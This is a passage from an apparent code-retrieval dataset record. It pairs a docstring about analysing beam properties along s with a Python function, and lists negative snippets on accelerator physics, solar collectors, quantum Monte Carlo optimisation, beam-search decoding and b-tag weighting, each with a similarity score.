self.NeA = NeA[inds]\n self.NeB = NeB[inds]\n self.NeC = NeC[inds]\n\n self.longA = longA[inds]\n self.longB = longB[inds]\n self.longC = longC[inds]\n\n self.latA = latA[inds]\n self.latB = latB[inds]\n self.latC = latC[inds]\n\n self.radA = radA[inds]\n self.radB = radB[inds]\n self.radC = radC[inds]\n\n self.velA = velA[inds]\n self.velB = velB[inds]\n self.velC = velC[inds]\n\n self.altA = altA[inds]\n self.altB = altB[inds]\n self.altC = altC[inds]\n\n self.mlatA = mlatA[inds]\n self.mlatB = mlatB[inds]\n self.mlatC = mlatC[inds]\n\n self.mlongA = mlongA[inds]\n self.mlongB = mlongB[inds]\n self.mlongC = mlongC[inds]\n\n self.mltA = mltA[inds]\n self.mltB = mltB[inds]\n self.mltC = mltC[inds]\n\n self.secondsA = secondsA[inds]\n self.secondsB = secondsB[inds]\n self.secondsC = secondsC[inds]", "def _normalizeTime(self, t : float) -> float:\n return (t - self.t0)/self.tau", "def reverseString(self, s) -> None:\n # n=len(s)\n # for i in range(int(n/2)):\n # s[i],s[n-1-i]=s[n-1-i],s[i]\n s=s[::-1]\n print(s)", "def _STEPS2TIME(step):\n return step/1000.", "def inverseLaplace(Y_s,t=None):\n \n # load the step response as a system in scipy.signal\n num,den = symToTransferFn(Y_s)\n \n # evaluate in time domain\n t,y = sp.impulse((num,den),T=t)\n return t,y", "def decode_longs(data_structure):\n return walk_tree(str_to_long, data_structure)", "def _make_historical_mat_time(\n deltas: np.ndarray,\n changepoints_t: np.ndarray,\n n_row: int,\n single_diff: float,\n) -> Tuple[np.ndarray, np.ndarray]:\n prev_time = np.arange(0, 1 + single_diff, single_diff)\n idxs = []\n for changepoint in changepoints_t:\n idxs.append(np.where(prev_time > changepoint)[0][0])\n prev_deltas = np.zeros(len(prev_time))\n prev_deltas[idxs] = deltas\n prev_deltas = np.repeat(prev_deltas.reshape(1, -1), n_row, axis=0)\n return prev_deltas, prev_time", "def transform_to_seconds_without_intraday_gaps(timestamps: pd.DatetimeIndex, market_hours: ul.MarketHours, fake_daily_minutes_gap = 60):\n\n n_timestamps = timestamps.size\n transformed_seconds = np.zeros((n_timestamps,1))\n timestamps = ul.convert2dt(timestamps)\n for i in range(n_timestamps):\n transformed_seconds[i,0] = market_hours.to_seconds_since_origin_without_intraday_gaps(timestamps[i], fake_daily_minutes_gap)\n \n return transformed_seconds" ]
[ "0.5729294", "0.535365", "0.5282586", "0.52594215", "0.5227779", "0.5178457", "0.51595366", "0.507217", "0.5067364", "0.50368345", "0.5025668", "0.49911958", "0.49690363", "0.49690363", "0.49686134", "0.4950423", "0.490032", "0.4897815", "0.48929238", "0.4863648", "0.4863037", "0.48580927", "0.4857599", "0.4852297", "0.4812424", "0.47922513", "0.47916633", "0.4785798", "0.47652596", "0.47651666", "0.47647715", "0.47375464", "0.47330213", "0.4731381", "0.47208524", "0.47095153", "0.47052705", "0.4700582", "0.4700315", "0.4691642", "0.46910304", "0.46868083", "0.4678329", "0.46522412", "0.4651215", "0.46445388", "0.46360865", "0.46228248", "0.4617045", "0.46138903", "0.4613504", "0.46031696", "0.4601545", "0.46011484", "0.45896104", "0.45789918", "0.45765463", "0.4574678", "0.4571693", "0.45690617", "0.45685166", "0.45663363", "0.4564176", "0.45633382", "0.45587415", "0.4556317", "0.4551879", "0.45505613", "0.4550204", "0.4549725", "0.4548361", "0.45475507", "0.45440668", "0.45418063", "0.4541134", "0.45394292", "0.4529518", "0.45288932", "0.45278206", "0.45243275", "0.45243075", "0.45243075", "0.45243075", "0.45232236", "0.45232236", "0.45222136", "0.4518785", "0.45153716", "0.4514397", "0.4510865", "0.45101738", "0.45090884", "0.4508093", "0.4498395", "0.44959283", "0.44957903", "0.44858718", "0.44752252", "0.4456938", "0.44483522" ]
0.49709463
12
We use this function to analyze the beam property along s.
def beam_property_along_s(ps, id_slices): prop_s = np.zeros((14, len(id_slices))) for n in range(len(id_slices)): ps_s = np.take(ps, id_slices[n], axis=1) prop_s[0, n] = np.average(ps_s[0,:]) prop_s[1, n] = np.average(ps_s[1,:]) prop_s[2, n] = np.average(ps_s[2,:]) prop_s[3, n] = np.average(ps_s[3,:]) prop_s[4, n] = np.std(ps_s[0,:]) prop_s[5, n] = np.std(ps_s[2,:]) prop_s[6:, n] = emittance_and_twiss(ps_s) return prop_s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prt_beam_prms(self):\n print '\\nIon Charge States = ', self.M.conf()['IonChargeStates']\n print 'IonEs [MeV] = ', self.M.conf()['IonEs']/1e6\n print 'IonEk [MeV] = ', self.M.conf()['IonEk']/1e6\n print '\\nBaryCenter 0:\\n', self.M.conf()['BaryCenter0']\n print '\\nBaryCenter 1:\\n', self.M.conf()['BaryCenter1']\n print '\\nBeam Envelope 0:\\n', self.M.conf()['S0']\n print '\\nBeam Envelope 1:\\n', self.M.conf()['S1']", "def calc_IAM_beam_SC(Az_vector, g_vector, ha_vector, teta_z, tilt_angle, type_SCpanel, Sz_vector, latitude):\n\n def calc_teta_L(Az, teta_z, tilt, Sz):\n teta_la = tan(Sz) * cos(teta_z - Az)\n teta_l = degrees(abs(atan(teta_la) - tilt))\n if teta_l < 0:\n teta_l = min(89, abs(teta_l))\n if teta_l >= 90:\n teta_l = 89.999\n return teta_l # longitudinal incidence angle in degrees\n\n def calc_teta_T(Az, Sz, teta_z):\n teta_ta = sin(Sz) * sin(abs(teta_z - Az))\n teta_T = degrees(atan(teta_ta / cos(teta_ta)))\n if teta_T < 0:\n teta_T = min(89, abs(teta_T))\n if teta_T >= 90:\n teta_T = 89.999\n return teta_T # transversal incidence angle in degrees\n\n def calc_teta_L_max(teta_L):\n if teta_L < 0:\n teta_L = min(89, abs(teta_L))\n if teta_L >= 90:\n teta_L = 89.999\n return teta_L\n\n def calc_IAMb(teta_l, teta_T, type_SCpanel):\n if type_SCpanel == 'FP': # # Flat plate collector 1636: SOLEX BLU, SPF, 2012\n IAM_b = -0.00000002127039627042 * teta_l ** 4 + 0.00000143550893550934 * teta_l ** 3 - 0.00008493589743580050 * teta_l ** 2 + 0.00041588966590833100 * teta_l + 0.99930069929920900000\n if type_SCpanel == 'ET': # # evacuated tube Zewotherm ZEWO-SOL ZX 30, SPF, 2012\n IAML = -0.00000003365384615386 * teta_l ** 4 + 0.00000268745143745027 * teta_l ** 3 - 0.00010196678321666700 * teta_l ** 2 + 0.00088830613832779900 * teta_l + 0.99793706293541500000\n IAMT = 0.000000002794872 * teta_T ** 5 - 0.000000534731935 * teta_T ** 4 + 0.000027381118880 * teta_T ** 3 - 0.000326340326281 * teta_T ** 2 + 0.002973799531468 * teta_T + 1.000713286764210\n IAM_b = IAMT * IAML # overall incidence angle modifier for beam radiation\n return IAM_b\n\n # convert to radians\n teta_z = radians(teta_z)\n tilt = radians(tilt_angle)\n\n g_vector = np.radians(g_vector)\n ha_vector = np.radians(ha_vector)\n lat = radians(latitude)\n Sz_vector = np.radians(Sz_vector)\n Az_vector = np.radians(Az_vector)\n Incidence_vector = np.vectorize(solar_equations.calc_incident_angle_beam)(g_vector, lat, ha_vector, tilt,\n teta_z) # incident angle in radians\n\n # calculate incident angles\n if type_SCpanel == 'FP':\n incident_angle = np.degrees(Incidence_vector)\n Teta_L = np.vectorize(calc_teta_L_max)(incident_angle)\n Teta_T = 0 # not necessary for flat plate collectors\n if type_SCpanel == 'ET':\n Teta_L = np.vectorize(calc_teta_L)(Az_vector, teta_z, tilt, Sz_vector) # in degrees\n Teta_T = np.vectorize(calc_teta_T)(Az_vector, Sz_vector, teta_z) # in degrees\n\n # calculate incident angle modifier for beam radiation\n IAM_b_vector = np.vectorize(calc_IAMb)(Teta_L, Teta_T, type_SCpanel)\n\n return IAM_b_vector", "def sr(self, params, r_s, sz_s, energy_s):\n\n self.itr += 1\n\n r_av = jnp.reshape(r_s[:,:,0:self.nav,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nav, self.npart, self.ndim))\n sz_av = jnp.reshape(sz_s[:,:,0:self.nav,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nav, self.npart, 2))\n energy_av = jnp.reshape(energy_s[:,:,0:self.nav], (self.n_devices, self.nwalk // self.n_devices * self.nav))\n\n r_val = jnp.reshape(r_s[:,:,0:self.nac,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nac, self.npart, self.ndim))\n sz_val = jnp.reshape(sz_s[:,:,0:self.nac,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nac, self.npart, 2))\n energy_val = jnp.reshape(energy_s[:,:,0:self.nac], (self.n_devices, self.nwalk // self.n_devices * self.nac))\n r_avg, r_max = self.observables.radius_pmap(r_val, sz_val)\n logger.info(f\"Maximum Radius validation=, {jnp.sqrt(r_max):.3f} \")\n logger.info(f\"Average Radius validation=, {jnp.sqrt(r_avg):.3f} \")\n psi_val = self.wavefunction.psi_pmap(params, r_val, sz_val)\n logger.info(f\"Maximum Psi validation= ,{jnp.max(jnp.abs(psi_val)):.4e} \")\n logger.info(f\"Average Psi validation= ,{jnp.mean(jnp.abs(psi_val)):.4e} \")\n logger.info(f\"Minimum Psi validation= ,{jnp.min(jnp.abs(psi_val)):.4e} \")\n\n r_tst = jnp.reshape(r_s[:,:,self.nav:self.nav+self.nac,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nac, self.npart, self.ndim))\n sz_tst = jnp.reshape(sz_s[:,:,self.nav:self.nav+self.nac,:,:], (self.n_devices, self.nwalk // self.n_devices * self.nac, self.npart, 2))\n energy_tst = jnp.reshape(energy_s[:,:,self.nav:self.nav+self.nac], (self.n_devices, self.nwalk // self.n_devices * self.nac))\n r_avg, r_max = self.observables.radius_pmap(r_tst, sz_tst)\n logger.info(f\"Maximum Radius test=, {jnp.sqrt(r_max):.3f} \")\n logger.info(f\"Average Radius test=, {jnp.sqrt(r_avg):.3f} \")\n psi_tst = self.wavefunction.psi_pmap(params, r_tst, sz_tst)\n logger.info(f\"Maximum Psi test= ,{jnp.max(jnp.abs(psi_tst)):.4e} \")\n logger.info(f\"Average Psi test= ,{jnp.mean(jnp.abs(psi_tst)):.4e} \")\n logger.info(f\"Minimum Psi test= ,{jnp.min(jnp.abs(psi_tst)):.4e} \")\n\n if (self.solver == 'Adam'):\n dp_i, self.g2_i, self.m_i = self.adam(params, r_av, sz_av, energy_av, g2_i = self.g2_i, m_i = self.m_i, itr = self.itr)\n elif (self.solver == 'Cholesky'):\n dp_i, self.g2_i = self.sr_cholesky(params, r_av, sz_av, energy_av, g2_i = self.g2_i, itr = self.itr) \n elif (self.solver == 'Pseudo'):\n dp_i = self.sr_pseudo(params, r_av, sz_av, energy_av) \n elif (self.solver == 'CG'):\n dp_i, self.g2_i = self.sr_cg(params, r_av, sz_av, energy_av, dp0_i=self.dp_i, g2_i = self.g2_i, itr = self.itr) \n\n self.dp_i = dp_i\n energy_d_min= 1.\n converged = False\n dp_range = jnp.linspace(0.1, 0.8, self.nstep)\n for n in range (self.nstep):\n# dt = dt_range[n]\n dp_n = self.delta * dp_i#[n] #+ dp_range[n] * self.dp_o\n dp_max = jnp.max(jnp.abs(dp_n)) \n delta_p = self.wavefunction.unflatten_params(dp_n) \n# delta_p = self.wavefunction.unflatten_params( self.delta * dp_i ) \n\n psi_d_tst, psi_d_err_tst, energy_d_tst, energy_d_err_tst, overlap_tst = self.pmap_dist(delta_p, params, r_tst, sz_tst, psi_tst, energy_tst)\n dist_tst = jnp.arccos(jnp.sqrt(psi_d_tst))**2\n logger.debug(f\"dist acos tst = {dist_tst:.8f}\")\n logger.debug(f\"energy diff tst = {energy_d_tst:.6f}, err = {energy_d_err_tst:.6f}\")\n logger.debug(f\"overlap tst= { jnp.arccos(jnp.sqrt(overlap_tst))**2:.8f}\")\n \n psi_d_val, psi_d_err_val, energy_d_val, energy_d_err_val, overlap_val = self.pmap_dist(delta_p, params, r_val, sz_val, psi_val, energy_val)\n dist_val = jnp.arccos(jnp.sqrt(psi_d_val))**2\n logger.debug(f\"dist acos val = {dist_val:.8f}\")\n logger.debug(f\"energy diff val= {energy_d_val:.6f}, err = {energy_d_err_val:.6f}\")\n logger.debug(f\"overlap val = { jnp.arccos(jnp.sqrt(overlap_val))**2:.8f}\")\n\n logger.debug(f\"delta param max = {dp_max:.6f}\")\n logger.debug(f\"delta param avg = {jnp.linalg.norm(dp_n):.6f}\")\n\n if ( dist_tst < 0.1 and dist_val < 0.1 and energy_d_val < energy_d_min and dp_max < 0.5):\n energy_d_min = energy_d_val\n energy_d_err_min = energy_d_err_val\n delta_p_min = delta_p\n dp_n_min = dp_n\n converged = True\n if converged: \n logger.debug(f\"Converged, energy diff min = {energy_d_min:.6f}, err = {energy_d_err_min:.6f}\")\n else:\n logger.debug(f\"Not converged\")\n delta_p_min = self.wavefunction.unflatten_params(jnp.zeros(self.nparams))\n dp_n_min = jnp.zeros(self.nparams)\n return delta_p_min", "def _beam(self):\n\n return self._beam_factory.simple(self.detectorbase.wavelength)", "def __smooth_emission_params(self):\n params_count = {}\n unique_symbols = []\n for key, value in self.emission_dict.items():\n if key[0] not in unique_symbols:\n unique_symbols.append(key[0])\n \n n = len(unique_symbols)\n # n refers to the number of observations/symbols \n\n for state in self.states:\n params_count[state] = [0,0,0]\n # print(params_count[state])\n # key is the state, value is list [total no. of symbols, total no. of non-zero probability, probability p]\n # i.e. [Ts, v, p]\n for key, value in self.emission_dict.items():\n if state in key:\n params_count[state][0] += 1\n if value != 0:\n params_count[state][1] += 1\n else:\n continue\n params_count[state][2] += 1/(params_count[state][0] + params_count[state][1])\n # p = 1/(Ts+v)\n \n for state in self.states:\n for key, value in self.emission_dict.items():\n if state in key:\n if value != 0:\n self.emission_dict[key] = value - params_count[state][2]\n else:\n self.emission_dict[key] = (params_count[state][2]*params_count[state][2])/n-params_count[state][2]\n # v*p/n-v", "def beam_search(self, src_sent, beam_size=5, max_decoding_time_step=70):\n src_sents_var = to_tensor(self.vocabs.src, [src_sent], device=self.device)\n\n src_encodings, dec_init_vec = self.encoder(src_sents_var, [len(src_sent)])\n src_encodings_att_linear = self.decoder.attn_projection(src_encodings)\n\n h_tm1 = dec_init_vec\n att_tm1 = torch.zeros(1, self.decoder.hidden_size, device=self.device)\n\n hypotheses = [[\"<sos>\"]]\n hyp_scores = torch.zeros(len(hypotheses), dtype=torch.float, device=self.device)\n completed_hypotheses = []\n\n t = 0\n while len(completed_hypotheses) < beam_size and t < max_decoding_time_step:\n t += 1\n hyp_num = len(hypotheses)\n\n exp_src_encodings = src_encodings.expand(hyp_num,\n src_encodings.size(1),\n src_encodings.size(2))\n\n exp_src_encodings_att_linear = src_encodings_att_linear.expand(hyp_num,\n src_encodings_att_linear.size(1),\n src_encodings_att_linear.size(2))\n\n y_tm1 = torch.tensor([self.vocabs.tgt.w2i[hyp[-1]] for hyp in hypotheses], dtype=torch.long, device=self.device)\n y_t_embed = self.decoder.embedding(y_tm1)\n\n x = torch.cat([y_t_embed, att_tm1], dim=-1)\n\n (h_t, cell_t), att_t, _ = self.decoder.step(x, h_tm1,\n exp_src_encodings, exp_src_encodings_att_linear, encoder_masks=None)\n\n # log probabilities over target words\n log_p_t = F.log_softmax(self.decoder.vocab_projection(att_t), dim=-1)\n\n live_hyp_num = beam_size - len(completed_hypotheses)\n contiuating_hyp_scores = (hyp_scores.unsqueeze(1).expand_as(log_p_t) + log_p_t).view(-1)\n top_cand_hyp_scores, top_cand_hyp_pos = torch.topk(contiuating_hyp_scores, k=live_hyp_num)\n\n prev_hyp_ids = top_cand_hyp_pos / len(self.vocabs.tgt)\n hyp_word_ids = top_cand_hyp_pos % len(self.vocabs.tgt)\n\n new_hypotheses = []\n live_hyp_ids = []\n new_hyp_scores = []\n\n for prev_hyp_id, hyp_word_id, cand_new_hyp_score in zip(prev_hyp_ids, hyp_word_ids, top_cand_hyp_scores):\n prev_hyp_id = prev_hyp_id.item()\n hyp_word_id = hyp_word_id.item()\n cand_new_hyp_score = cand_new_hyp_score.item()\n\n hyp_word = self.vocabs.tgt.i2w[hyp_word_id]\n new_hyp_sent = hypotheses[prev_hyp_id] + [hyp_word]\n if hyp_word == \"<eos>\":\n completed_hypotheses.append(Hypothesis(value=new_hyp_sent[1:-1],\n score=cand_new_hyp_score))\n else:\n new_hypotheses.append(new_hyp_sent)\n live_hyp_ids.append(prev_hyp_id)\n new_hyp_scores.append(cand_new_hyp_score)\n\n if len(completed_hypotheses) == beam_size:\n break\n\n live_hyp_ids = torch.tensor(live_hyp_ids, dtype=torch.long, device=self.device)\n h_tm1 = (h_t[live_hyp_ids], cell_t[live_hyp_ids])\n att_tm1 = att_t[live_hyp_ids]\n\n hypotheses = new_hypotheses\n hyp_scores = torch.tensor(new_hyp_scores, dtype=torch.float, device=self.device)\n\n if len(completed_hypotheses) == 0:\n completed_hypotheses.append(Hypothesis(value=hypotheses[0][1:],\n score=hyp_scores[0].item()))\n\n completed_hypotheses.sort(key=lambda hyp: hyp.score, reverse=True)\n\n return completed_hypotheses", "def cal_ResBeam_Stats(infile, header_bmaj, header_bmin):\n\n beamlog_file = np.loadtxt(infile)\n bmaj = beamlog_file[:,1]\n bmin = beamlog_file[:,2]\n ind_nonzero_bmaj = np.nonzero(bmaj) # finding array indices of nonzero values\n ind_nonzero_bmin = np.nonzero(bmin)\n total_nbmaj = np.count_nonzero(bmaj) # count total number of bmaj non zero occurance\n total_nbmin = np.count_nonzero(bmin)\n bmaj_variance = (np.sum((bmaj[ind_nonzero_bmaj]-header_bmaj)**2.0))/total_nbmaj # using header beam value as mean \n bmin_variance = (np.sum((bmin[ind_nonzero_bmin]-header_bmin)**2.0))/total_nbmin\n bmaj_stdev = np.sqrt(bmaj_variance)\n bmin_stdev = np.sqrt(bmin_variance)\n beam_threshold = round((((header_bmaj + bmaj_stdev) * (header_bmin + bmin_stdev))/ (header_bmaj*header_bmin))-1.0, 4)\n bmaj_max = np.max(bmaj[ind_nonzero_bmaj])\n bmaj_min = np.min(bmaj[ind_nonzero_bmaj])\n bmin_max = np.max(bmin[ind_nonzero_bmin])\n bmin_min = np.min(bmin[ind_nonzero_bmin])\n max_ratio_beam_area = (bmaj_max*bmin_max)/(header_bmaj*header_bmin) # measured beam area / header beam area\n min_ratio_beam_area = (bmaj_min*bmin_min)/(header_bmaj*header_bmin)\n\n return bmaj_stdev, bmin_stdev, beam_threshold, max_ratio_beam_area, min_ratio_beam_area", "def main_beam_eff(beam=1, ZA=0, frequency=1400.): # apply the frequency at 1400\n D = 300 # m\n n_R = 1.0\n lam = 299792458./(1e6*frequency)\n theta = beam_size(beam=beam,frequency=frequency)/60. * np.pi/180.\n ape_eff = aperture_eff(beam=beam, ZA=ZA, frequency=frequency) \n mb_eff = 0.8899 * ape_eff / n_R * theta**2 * D**2 / lam**2\n\n return mb_eff", "def calc_enginprops(self):\n # Let's assemble the ABD matrix even if it is not required\n ABD = np.bmat([[self.A, self.B], [self.B, self.D]])\n ABD_inv = np.linalg.inv(ABD)\n # We would use the whole matrix. This gives results similar to elamX and considers poisson effects\n A_inv = ABD_inv[0:3, 0:3]\n self.Ex = 1 / (self.total_t * A_inv[0, 0]) # It is 2 * t because we need total thickness\n self.Ey = 1 / (self.total_t * A_inv[1, 1])\n self.Gxy = 1 / (self.total_t * A_inv[2, 2])\n self.poissonxy = - A_inv[0,1] / A_inv[0, 0]\n # Flexural stiffness properties\n self.zx = 0.0\n self.zy = 0.0\n zx_dem = 0.0\n zy_dem = 0.0\n self.EIx = 0.0\n self.EIy = 0.0\n z = 0.0\n # Calculate neutral axis in direction x and y\n for S_bar, t in zip(self.S_bars, self.ts):\n Ex = 1 / S_bar[0, 0]\n Ey = 1 / S_bar[1, 1]\n z += t / 2.0\n self.zx += Ex * t * z\n zx_dem += Ex * t\n self.zy += Ey * t * z\n zy_dem += Ey * t\n z += t / 2.0\n self.zx = self.zx / zx_dem\n self.zy = self.zy / zy_dem\n # Calculate EI in direction x and y\n z = 0.0\n for S_bar, t in zip(self.S_bars, self.ts):\n Ex = 1 / S_bar[0, 0]\n Ey = 1 / S_bar[1, 1]\n Gxy = 1 / S_bar[2, 2]\n z += t / 2.0\n self.EIx += Ex * (t**3 / 12 + t * (z - self.zx)**2)\n self.EIy += Ey * (t**3 / 12 + t * (z - self.zy)**2)\n self.GA += Gxy * t\n z += t / 2.0\n return self.Ex, self.Ey, self.Gxy, self.poissonxy", "def _beam_search(self, state):\n\n beam = [(self.episode_reward, self.mcts_head)]\n next_beam = []\n\n def format_beam():\n return [node.path for _, node in beam]\n\n if self.verbose > 1:\n logger.debug(f\"Starting beam search with beam size {self.beam_size}. Initial beam: {format_beam()}\")\n\n while beam or next_beam:\n for i, (_, node) in enumerate(beam):\n # Parse current state\n this_state, total_reward, terminal = self._parse_path(state, node.path)\n node.set_terminal(terminal)\n if self.verbose > 1:\n logger.debug(f\" Analyzing node {i+1} / {len(beam)} on beam: {node.path}\")\n\n # Expand\n if not node.terminal and not node.children:\n actions = self._find_legal_actions(this_state)\n step_rewards = [self._parse_action(action, from_which_env=\"sim\") for action in actions]\n if self.verbose > 1:\n logger.debug(f\" Expanding: {len(actions)} legal actions\")\n node.expand(actions, step_rewards=step_rewards)\n\n # If terminal, backup reward\n if node.terminal:\n if self.verbose > 1:\n logger.debug(f\" Node is terminal\")\n if self.verbose > 1:\n logger.debug(f\" Backing up total reward {total_reward}\")\n node.give_reward(self.episode_reward + total_reward, backup=True)\n\n # Did we already process this one? Then skip it\n if node.n_beamsearch >= self.beam_size:\n if self.verbose > 1:\n logger.debug(f\" Already beam searched this node sufficiently\")\n continue\n\n # Beam search selection\n for action in node.select_beam_search(self.beam_size):\n next_reward = total_reward + node.children[action].q_step\n next_node = node.children[action]\n next_beam.append((next_reward, next_node))\n\n # Mark as visited\n node.in_beam = True\n\n # Just keep top entries for next step\n beam = sorted(next_beam, key=lambda x: x[0], reverse=True)[: self.beam_size]\n if self.verbose > 1:\n logger.debug(\n f\"Preparing next step, keeping {self.beam_size} / {len(next_beam)} nodes in beam: {format_beam()}\"\n )\n next_beam = []\n\n logger.debug(f\"Finished beam search\")\n\n if self.verbose > 0:\n choice = self.mcts_head.select_best(mode=\"max\")\n self._report_decision(choice, state, \"Beam search\")", "def analyze_natural_focusing(ps_beg, beamline, gamma, id_slices, zplot):\n\n ps_before = ps_beg\n\n count_UND = 0\n\n for element in beamline:\n ps_after = np.dot( element.M1, ps_before ) +element.M2\n\n # Check whether this element is an undulatorself.\n if isinstance(element, Undulator):\n count_UND += 1\n # The phase space distribution along the bunch before and after the\n # bunch.\n ps_s_before = beam_property_along_s(ps_before, id_slices)\n ps_s_after = beam_property_along_s(ps_after, id_slices)\n\n label1 = 'Before UND '+str(count_UND)\n label2 = 'After UND '+str(count_UND)\n save_name = 'Natural_focusing_in_UND'+str(count_UND)\n plt.figure()\n plt.plot(zplot[0:-1], ps_s_before[3,:]*gamma, label = label1)\n plt.plot(zplot[0:-1], ps_s_after[3,:]*gamma, label = label2)\n plt.grid()\n plt.legend()\n plt.savefig(save_name)\n ## End if\n\n ps_before = ps_after\n\n return", "def filter_beam(self, setting):\n\n self.beam_filter = setting\n\n # In manual mode determine number of raw invalid and number of 3 beam solutions\n # 3 beam solutions if selected\n if self.beam_filter > 0:\n\n # Find invalid raw data\n valid_vel = np.ones(self.raw_vel_mps.shape)\n valid_vel[np.isnan(self.raw_vel_mps)] = 0\n\n # Determine how many beams transformed coordinates are valid\n valid_vel_sum = np.sum(valid_vel, 0)\n valid = np.ones(valid_vel_sum.shape)\n\n # Compare number of valid beams or coordinates to filter value\n valid[valid_vel_sum < self.beam_filter] = False\n\n # Save logical of valid data to object\n self.valid_data[5, :] = valid\n\n else:\n\n # Apply automatic filter\n # ----------------------\n # Find all 3 beam solutions\n self.filter_beam(3)\n beam_3_valid_data = copy.deepcopy(self.valid_data)\n self.filter_beam(4)\n valid_3_beams = np.logical_xor(beam_3_valid_data[5, :], self.valid_data[5, :])\n n_ens = len(self.valid_data[5, :])\n idx = np.where(valid_3_beams == True)[0]\n\n # If 3 beam solutions exist evaluate there validity\n if len(idx) > 0:\n\n # Identify 3 beam solutions that appear to be invalid\n n3_beam_ens = len(idx)\n\n # Check each three beam solution for validity\n for m in range(n3_beam_ens):\n\n # Use before and after values to check 3-beam solution\n # but make sure the ensemble is not the first or last.\n if (idx[m] > 1) and (idx[m] < n_ens):\n\n # Find nearest 4 beam solutions before and after\n # 3 beam solution\n ref_idx_before = np.where(self.valid_data[5, :idx[m]] == True)[0]\n if len(ref_idx_before) > 0:\n ref_idx_before = ref_idx_before[-1]\n else:\n ref_idx_before = None\n\n ref_idx_after = np.where(self.valid_data[5, idx[m]:] == True)[0]\n if len(ref_idx_after) > 0:\n ref_idx_after = idx[m] + ref_idx_after[0]\n else:\n ref_idx_after = None\n\n if (ref_idx_after is not None) and (ref_idx_before is not None):\n u_ratio = (self.u_mps[idx[m]]) / ((self.u_mps[ref_idx_before]\n + self.u_mps[ref_idx_after]) / 2.) - 1\n v_ratio = (self.v_mps[idx[m]]) / ((self.v_mps[ref_idx_before]\n + self.v_mps[ref_idx_after]) / 2.) - 1\n else:\n u_ratio = 1\n v_ratio = 1\n\n # If 3-beam differs from 4-beam by more than 50% mark it invalid\n if (np.abs(u_ratio) > 0.5) and (np.abs(v_ratio) > 0.5):\n self.valid_data[5, idx[m]] = False\n else:\n self.valid_data[5, idx[m]] = True\n\n self.beam_filter = -1\n\n # Combine all filter data to composite valid data\n self.valid_data[0, :] = np.all(self.valid_data[1:, :], 0)\n self.num_invalid = np.sum(self.valid_data[0, :] == False)", "def calculate_marginal(self):\n self.marginal_ray=beam_field()\n m=self.marginal_ray\n m.U=np.array([[[0,0,1]]])\n m.Q_p=np.array([[[0,self.entrance_pupil,0]]])\n m.propagate(self.surfaces)", "def prob_t_a_given_s(self, alignment_info):\n ...", "def initialize(self, es):\n r = es.sp.weights.mueff / es.popsize\n self.index_to_compare = 0.5 * (r**0.5 + 2.0 * (1 - r**0.5) / np.log(es.N + 9)**2) * (es.popsize) # TODO\n self.index_to_compare = 0.30 * es.popsize # TODO\n self.damp = 2 - 2 / es.N # sign-rule: 2\n self.c = 0.3 # sign-rule needs <= 0.3\n self.s = 0 # averaged statistics, usually between -1 and +1", "def analyze(self, event):\n jets = Collection(event, \"Jet\")\n\n BTagWeightN = 1.0\n BTagWeightN_up = 1.0\n BTagWeightN_down = 1.0\n BTagWeightN_FS = 1.0\n BTagWeightN_up_FS = 1.0\n BTagWeightN_down_FS = 1.0\n BTagWeightD = 1.0\n BTagWeightNHeavy = 1.0\n BTagWeightNHeavy_up = 1.0\n BTagWeightNHeavy_down = 1.0\n BTagWeightNHeavy_FS = 1.0\n BTagWeightNHeavy_up_FS = 1.0\n BTagWeightNHeavy_down_FS = 1.0\n BTagWeightDHeavy = 1.0\n BTagWeightNLight = 1.0\n BTagWeightNLight_FS = 1.0\n BTagWeightNLight_up = 1.0\n BTagWeightNLight_up_FS= 1.0\n BTagWeightNLight_down = 1.0\n BTagWeightNLight_down_FS = 1.0\n BTagWeightDLight = 1.0\n\n for jet in jets:\n pt = jet.pt\n eta = abs(jet.eta)\n flavor = jet.hadronFlavour\n\n if not ( pt > self.jetPtMin and eta < self.jetEtaMax): continue\n\n if flavor == 5:\n pt_bin = self.h_eff_b.GetXaxis().FindBin(pt); \n if pt_bin > self.h_eff_b.GetXaxis().GetNbins():\n pt_bin = self.h_eff_b.GetXaxis().GetNbins(); \n eta_bin = self.h_eff_b.GetYaxis().FindBin(eta); \n if eta_bin > self.h_eff_b.GetYaxis().GetNbins():\n eta_bin = self.h_eff_b.GetYaxis().GetNbins();\n\n eff = self.h_eff_b.GetBinContent(pt_bin, eta_bin);\n\n elif flavor == 4:\n pt_bin = self.h_eff_c.GetXaxis().FindBin(pt); \n if pt_bin > self.h_eff_c.GetXaxis().GetNbins():\n pt_bin = self.h_eff_c.GetXaxis().GetNbins(); \n eta_bin = self.h_eff_c.GetYaxis().FindBin(eta); \n if eta_bin > self.h_eff_c.GetYaxis().GetNbins():\n eta_bin = self.h_eff_c.GetYaxis().GetNbins();\n\n eff = self.h_eff_c.GetBinContent(pt_bin, eta_bin);\n\n else:\n pt_bin = self.h_eff_udsg.GetXaxis().FindBin(pt); \n if pt_bin > self.h_eff_udsg.GetXaxis().GetNbins():\n pt_bin = self.h_eff_udsg.GetXaxis().GetNbins(); \n eta_bin = self.h_eff_udsg.GetYaxis().FindBin(eta); \n if eta_bin > self.h_eff_udsg.GetYaxis().GetNbins():\n eta_bin = self.h_eff_udsg.GetYaxis().GetNbins();\n\n eff = self.h_eff_udsg.GetBinContent(pt_bin, eta_bin);\n \n if self.FastSim:\n btagSF = jet.btagSF\n btagSF_FS=jet.btagSF_FS\n btagSF_up_FS = jet.btagSF_FS_up\n btagSF_down_FS = jet.btagSF_FS_down\n btagSF_down = jet.btagSF_down\n btagSF_up = jet.btagSF_up\n else:\n btagSF = jet.btagSF\n btagSF_FS= 1.0\n btagSF_up = jet.btagSF_up\n btagSF_down = jet.btagSF_down\n btagSF_up_FS = 1.0\n btagSF_down_FS = 1.0\n \n if jet.btagDeepB > self.bDiscCut:\n #check if eff is zero\n if eff < 0.001:\n eff = 0.001\n \n BTagWeightN *= btagSF * eff\n BTagWeightN_FS *= btagSF_FS * eff\n BTagWeightN_up *= btagSF_up * eff\n BTagWeightN_down *= btagSF_down * eff\n BTagWeightN_up_FS *= btagSF_up_FS * eff\n BTagWeightN_down_FS *= btagSF_down_FS * eff\n\n if abs(flavor) == 5:\n BTagWeightNHeavy *= btagSF * eff\n BTagWeightNHeavy_FS *= btagSF_FS * eff\n BTagWeightNHeavy_up *= btagSF_up * eff\n 